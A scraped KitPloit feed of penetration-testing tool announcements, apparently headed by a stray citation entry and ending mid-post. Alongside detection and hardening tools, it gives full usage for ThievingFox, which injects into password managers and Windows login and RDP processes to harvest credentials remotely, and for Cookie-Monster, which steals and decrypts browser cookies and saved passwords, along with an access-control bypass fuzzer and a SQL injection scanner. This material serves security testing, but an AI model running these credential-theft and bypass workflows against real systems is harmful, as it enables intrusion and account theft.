    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

    By: Zion3R β€” May 13th 2024 at 12:30


    The original 403fuzzer.py :)

    Fuzz 401/403ing endpoints for bypasses

    This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.

    It will output the response code and length for each request, in a nicely organized, color-coded way so things are readable.

    I implemented a "Smart Filter" that lets you mute responses that look the same once they have been seen a certain number of times.

    You can now feed it raw HTTP requests that you save to a file from Burp.

    Follow me on twitter! @intrudir


    Usage

    usage: bypassfuzzer.py -h

    Specifying a request to test

    Best method: Feed it a raw HTTP request from Burp!

    Simply paste the request into a file and run the script!
    • It will parse and use cookies & headers from the request.
    • Easiest way to authenticate for your requests.

    python3 bypassfuzzer.py -r request.txt
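
    A saved request file is just the raw HTTP text. A hypothetical example (all values below are placeholders, not from the tool's docs):

    GET /admin/panel HTTP/1.1
    Host: example.com
    Cookie: session=blah
    Authorization: Bearer 1234567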

    Using other flags

    Specify a URL

    python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

    Specify cookies to use in requests:
    some examples:

    --cookies "cookie1=blah"
    -c "cookie1=blah; cookie2=blah"

    Specify a method/verb and body data to send

    bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
    bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

    Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: Bearer <token>.

    Specify -H "header: value" for each additional header you'd like to add:

    bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

    Smart filter feature!

    It is based on the response code and length: if the same response is seen 8 times or more, it is automatically muted.

    The repeat threshold can be changed in the code until an option to specify it via a flag is added.

    NOTE: Can't be used simultaneously with -hc or -hl (yet)

    # toggle smart filter on
    bypassfuzzer.py -u https://example.com/forbidden --smart
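
    Conceptually, the muting works something like the sketch below. This is an illustration only, not BypassFuzzer's actual code; the threshold of 8 comes from the note above.

    # Illustrative sketch of a "smart filter", not BypassFuzzer's implementation.
    from collections import Counter

    class SmartFilter:
        """Mute responses whose (status code, length) signature repeats too often."""
        def __init__(self, threshold=8):
            self.threshold = threshold
            self.seen = Counter()

        def should_report(self, status_code, content_length):
            signature = (status_code, content_length)
            self.seen[signature] += 1
            return self.seen[signature] <= self.threshold

    # Example: the 9th identical 403 with length 638 is muted.
    f = SmartFilter()
    print([f.should_report(403, 638) for _ in range(9)][-1])  # False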

    Specify a proxy to use

    Useful if you wanna proxy through Burp

    bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

    Skip sending header payloads or url payloads

    # skip sending headers payloads
    bypassfuzzer.py -u https://example.com/forbidden -sh
    bypassfuzzer.py -u https://example.com/forbidden --skip-headers

    # Skip sending path normalization payloads
    bypassfuzzer.py -u https://example.com/forbidden -su
    bypassfuzzer.py -u https://example.com/forbidden --skip-urls

    Hide response code/length

    Provide comma delimited lists without spaces. Examples:

    # Hide response codes
    bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

    # Hide response lengths of 638
    bypassfuzzer.py -u https://example.com/forbidden -hl 638

    TODO

    • [x] Automatically check other methods/verbs for bypass
    • [x] absolute domain attack
    • [ ] Add HTTP/2 support
    • [ ] Looking for ideas. Ping me on twitter! @intrudir


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R β€” May 10th 2024 at 12:30


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies:

    pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
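
    For example (the output filename here is illustrative):

    sqlmc -u http://example.com -d 2 -o results.txt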

    The tool will then perform the scan and display the results.
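
    Conceptually, the crawl-and-probe loop looks roughly like the sketch below. This is an illustration only, not SQLMC's actual code: it uses a simple error-based heuristic (inject a single quote and look for database error strings) and assumes the requests and beautifulsoup4 packages are installed.

    # Illustrative sketch only, not SQLMC's implementation.
    from urllib.parse import urljoin, urlparse, parse_qsl, urlencode, urlunparse

    import requests
    from bs4 import BeautifulSoup

    SQL_ERRORS = ("sql syntax", "mysql_fetch", "sqlite3", "pg_query", "ora-")

    def looks_injectable(url):
        """Append a single quote to each query parameter and look for DB error strings."""
        parts = urlparse(url)
        params = parse_qsl(parts.query)
        for i, (key, value) in enumerate(params):
            probed = list(params)
            probed[i] = (key, value + "'")
            probe_url = urlunparse(parts._replace(query=urlencode(probed)))
            body = requests.get(probe_url, timeout=10).text.lower()
            if any(err in body for err in SQL_ERRORS):
                return True
        return False

    def crawl_and_check(start_url, depth):
        """Breadth-first crawl limited to `depth` hops within the start domain."""
        domain = urlparse(start_url).netloc
        seen, frontier, findings = {start_url}, [(start_url, 0)], []
        while frontier:
            url, level = frontier.pop(0)
            if looks_injectable(url):
                findings.append(url)
            if level >= depth:
                continue
            soup = BeautifulSoup(requests.get(url, timeout=10).text, "html.parser")
            for a in soup.find_all("a", href=True):
                link = urljoin(url, a["href"])
                if urlparse(link).netloc == domain and link not in seen:
                    seen.add(link)
                    frontier.append((link, level + 1))
        return findings

    print(crawl_and_check("http://example.com", depth=2))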

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R β€” May 5th 2024 at 12:30


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN and the NX bit. The tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output: the results can be printed to the screen in table format or exported to a CSV file. (For more information, see the Documentation.md file.)


    Execute Scanning Example

    HardeningMeter can scan directories (e.g. '/usr/bin'), individual files (e.g. '/usr/sbin/newusers') and the system itself, and it can export the results to a CSV file. For example, to scan the '/bin/cp' file and the system:

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following:

    1. The readelf and file commands
    2. Python 3
    3. pip
    4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan; the argument can take more than one file, separated by spaces.

    -d --directory

    Specify the directory you want to scan; the argument takes one directory and scans all of its ELF files recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format

    Specify if you want to save the results to a CSV file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consist of 3 different states:

    • (X) - the binary hardening mechanism is disabled.
    • (V) - the binary hardening mechanism is enabled.
    • (-) - the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English, make sure to add "LC_ALL=C" before calling the script.
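
    For example, combined with the scan command shown earlier:

    LC_ALL=C python3 HardeningMeter.py -f /bin/cp -s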



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R β€” April 30th 2024 at 12:30


    ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

    The accompanying blog post can be found here


    Installation

    Linux

    Rustup must be installed; follow the instructions available here: https://rustup.rs/

    The mingw-w64 package must be installed. On Debian, this can be done using:

    apt install mingw-w64

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

    Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

    After adding the Mono repositories, Nuget can be installed using apt:

    apt install nuget

    Finally, Python dependencies must be installed:

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11.

    Windows

    Rustup must be installed; follow the instructions available here: https://rustup.rs/

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

    A .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

    Finally, Python dependencies must be installed:

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11

    NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell)

    Targets

    All modules have been tested on the following Windows versions:

    • Windows Server 2022
    • Windows Server 2019
    • Windows Server 2016
    • Windows Server 2012R2
    • Windows 10
    • Windows 11

    [!CAUTION] Modules have not been tested on other versions, and are expected not to work.

    Application                               Injection Method
    KeePass.exe                               AppDomainManager Injection
    KeePassXC.exe                             DLL Proxying
    LogonUI.exe (Windows Login Screen)        COM Hijacking
    consent.exe (Windows UAC Popup)           COM Hijacking
    mstsc.exe (Windows default RDP client)    COM Hijacking
    RDCMan.exe (Sysinternals' RDP client)     COM Hijacking
    MobaXTerm.exe (3rd party RDP client)      COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

    For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

    --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass module requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications
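
    As a hypothetical example based on the usage string above (domain, credentials, host and flag choices are placeholders):

    python3 client/ThievingFox.py poison 'domain/user:password@192.168.1.10' --keepass --mstsc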

    Cleanup

    For each application specified in the command line parameters, the cleanup module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

    For applications that support poisoning of both HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

    [!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
    --consent Try to cleanup all poisonning artifacts related to Consent.exe
    --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
    --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
    --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
    --all Try to cleanup all poisonning artifacts related to all applications

    Collect

    For each application specified in the command line parameters, the collect module retrieves the output files corresponding to the application that are stored on the remote host inside C:\Windows\Temp\<tempdir>, and decrypts them. The files are then deleted from the remote host, and the retrieved data is stored in client/output/.

    Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HackerInfo - Informations Web Application Security

    By: Zion3R β€” April 24th 2024 at 12:30




    Informations Web Application Security


    Install:

    sudo apt install python3 python3-pip

    pip3 install termcolor

    pip3 install google

    pip3 install optioncomplete

    pip3 install bs4


    pip3 install prettytable

    git clone https://github.com/Matrix07ksa/HackerInfo/

    cd HackerInfo

    chmod +x HackerInfo

    ./HackerInfo -h



    python3 HackerInfo.py -d www.facebook.com -f pdf
    [+] <-- Running Domain_filter_File ....-->
    [+] <-- Searching [www.facebook.com] Files [pdf] ....-->
    https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
    https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
    https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
    https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
    https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
    #####################[Finshid]########################

    Usage:

    (Usage screenshot: HackerInfo - Informations Web Application Security)

    Install the hackinfo library:

    sudo python setup.py install
    pip3 install hackinfo



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Cookie-Monster - BOF To Steal Browser Cookies & Credentials

    By: Zion3R β€” April 17th 2024 at 12:30


    Steal browser cookies for Edge, Chrome and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.


    BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
    cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-monster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
    --chromeCookiePID, if a chrome PID with a known handle to Cookies is provided, specify that pid to duplicate its handle and file
    --chromeLoginDataPID, if a chrome PID with a known handle to Login Data is provided, specify that pid to duplicate its handle and file
    --edgeCookiePID, if an edge PID with a known handle to Cookies is provided, specify that pid to duplicate its handle and file
    --edgeLoginDataPID, if an edge PID with a known handle to Login Data is provided, specify that pid to duplicate its handle and file

    EXE usage

    Cookie Monster Example:
    cookie-monster.exe --all
    Cookie Monster Options:
    -h, --help Show this help message and exit
    --all Run chrome, edge, and firefox methods
    --edge Extract edge keys and download Cookies/Login Data file to PWD
    --chrome Extract chrome keys and download Cookies/Login Data file to PWD
    --firefox Locate firefox key and Cookies, does not make a copy of either file

    Decryption Steps

    Install requirements

    pip3 install -r requirements.txt

    Base64 encode the webkit masterkey

    python3 base64-encode.py "\xec\xfc...."
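
    For clarity, this step just turns the escaped key bytes into base64. A rough Python equivalent (an illustration only, not the repository's base64-encode.py):

    import base64
    import sys

    # Interpret an argument such as "\xec\xfc..." as raw bytes, then base64-encode it.
    raw = sys.argv[1].encode().decode("unicode_escape").encode("latin-1")
    print(base64.b64encode(raw).decode())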

    Decrypt Chrome/Edge Cookies File

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

    Decrypt Chrome/Edge Passwords File

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

    Decrypt Firefox Cookies and Stored Credentials:
    https://github.com/lclevy/firepwd

    Installation

    Ensure Mingw-w64 and make are installed on Linux prior to compiling.

    make

    To compile the exe on Windows:

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

    TO-DO

    • Update decrypt.py to support Firefox based on firepwd and add a bruteforce module based on DonPAPI

    References

    This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
    Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
    Fileless download: https://github.com/fortra/nanodump
    Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

    By: Zion3R β€” April 8th 2024 at 12:30


    Permiso: https://permiso.io
    Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

    CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


    Notes

    To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

    Required Packages

    pip3 install -r requirements.txt

    Cloning cloudgrep locally

    To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

    chmod +x clone.sh
    ./clone.sh

    Input

    This tool offers a CLI (Command Line Interface). As such, here we review its use:

    Example 1 - Running the tool with default queries file

    Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

    Note

    Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

    {
        "AWS": [
            {
                "bucket": "cloudtrail-logs-00000000-ffffff",
                "prefix": [
                    "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
                    "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
                ]
            },
            {
                "bucket": "aws-kosova-us-east-1-00000000"
            }
        ],
        "AZURE": [
            {
                "accountname": "logs",
                "container": [
                    "cloudgrappler"
                ]
            }
        ]
    }

    Run command

    python3 main.py

    Example 2 - Permiso Intel Use Case

    python3 main.py -p

    [+] Running GetFileDownloadUrls.*secrets_ for AWS 
    [+] Threat Actor: LUCR3
    [+] Severity: MEDIUM
    [+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.

    Example 3 - Generate report

    python3 main.py -p -jo

    reports
    └── json
        ├── AWS
        │   └── 2024-03-04 01:01 AM
        │       └── cloudtrail-logs-00000000-ffffff--
        │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
        │               └── GetFileDownloadUrls.*secrets_.json
        └── AZURE
            └── 2024-03-04 01:01 AM
                └── logs
                    └── cloudgrappler
                        └── okta_key.json

    Example 4 - Filtering logs based on date or time

    python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

    Example 5 - Manually adding queries and data source types

    python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

    Example 6 - Running the tool with your own queries file

    python3 main.py -f new_file.json

    Running in your Cloud and Authentication cloudgrep

    AWS

    Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

    If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
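
    For example, on a laptop the simplest option is the AWS CLI's interactive setup (or the standard AWS credential environment variables):

    aws configure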

    Azure

    The simplest way to authenticate with Azure is to first run:

    az login

    This will open a browser window and prompt you to login to Azure.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

    By: Zion3R β€” April 5th 2024 at 11:30


    AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


    Star the Repo

    If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

    Features

    • Generates unique incident response scenarios based on chosen threat actor groups.
    • Allows you to specify your organisation's size and industry for a tailored scenario.
    • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
    • Create custom scenarios based on a selection of ATT&CK techniques.
    • Capture user feedback on the quality of the generated scenarios.
    • Downloadable scenarios in Markdown format.
    • 🆕 Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
    • Available as a Docker container image for easy deployment.
    • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


    Releases

    v0.4 (current)

    What's new, and why is it useful?

    • Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
    • Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
    • Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
    • Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

    v0.3

    What's new, and why is it useful?

